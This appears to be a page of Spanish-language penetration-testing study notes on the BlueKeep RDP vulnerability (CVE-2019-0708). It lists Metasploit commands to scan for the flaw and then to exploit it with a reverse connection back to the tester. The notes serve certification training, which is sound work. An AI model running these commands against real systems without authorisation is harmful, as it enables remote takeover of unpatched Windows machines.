┌─[ BlueKeep - Vulnerabilidad RDP ]──────────────────────────────────────────────────────────────────
│ user: Alejandro Lopez Aguilar
└ path: /en/apuntes/ejptv2/explotacion/windows/rdp/bluekeep-vulnerabilidad-rdp/

Vulnerabilidad BlueKeep en RDP

BlueKeep (identificada como CVE-2019-0708) es una vulnerabilidad crítica en el Protocolo de 
Escritorio Remoto (RDP) de Microsoft, permite la ejecución remota de código. Fue descubierta en mayo
de 2019 y afecta a varias versiones del sistema operativo Windows, incluyendo Windows 7, Windows 
Server 2008 R2 y Windows Server 2008.

:: ▸ Comprobación Vulnerable (Metasploit)

Usamos el módulo :  auxiliary/scanner/rdp/cve_2019_0708_bluekeep

┌─[ code ]──────────────────────────────────────────────────────────────────────────────────────────
use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
set RHOST <IP>
run
└───────────────────────────────────────────────────────────────────────────────────────────────────

:: ▸ Explotación con Metasploit

Usamos el módulo: exploit/windows/rdp/cve_2019_0708_bluekeep_rce

┌─[ code ]──────────────────────────────────────────────────────────────────────────────────────────
use exploit/windows/rdp/cve_2019_0708_bluekeep_rce
set RHOSTS <IP>
set LHOST <Local IP>
set LPORT <Local port>
show targets
set target <0-8>
exploit
└───────────────────────────────────────────────────────────────────────────────────────────────────

ret <volume_4>  <indice>